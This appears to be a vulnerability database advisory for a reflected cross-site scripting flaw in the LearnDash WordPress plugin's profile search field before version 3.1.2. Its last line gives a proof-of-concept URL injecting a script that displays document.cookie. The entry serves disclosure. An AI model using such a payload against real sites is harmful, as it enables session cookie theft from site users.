LearnDash < 3.1.2 - Reflected Cross Site Scripting (XSS) issue on the [ld_profile] search field.

2020-01-15T00:00:00
ID WPEX-ID:10026
Type wpexploit
Reporter Andrew Wilder
Modified 2020-09-22T00:00:00

Description

WordPress Vulnerability - LearnDash < 3.1.2 - Reflected Cross Site Scripting (XSS) issue on the [ld_profile] search field.

                                        
                                            From the Original Researcher (Jinson Varghese Behanan, @JinsonCyberSec):

[wordpress website][learndash my-account page]?ld-profile-search=%3Cscript%3Ealert(document.cookie)%3C/script%3E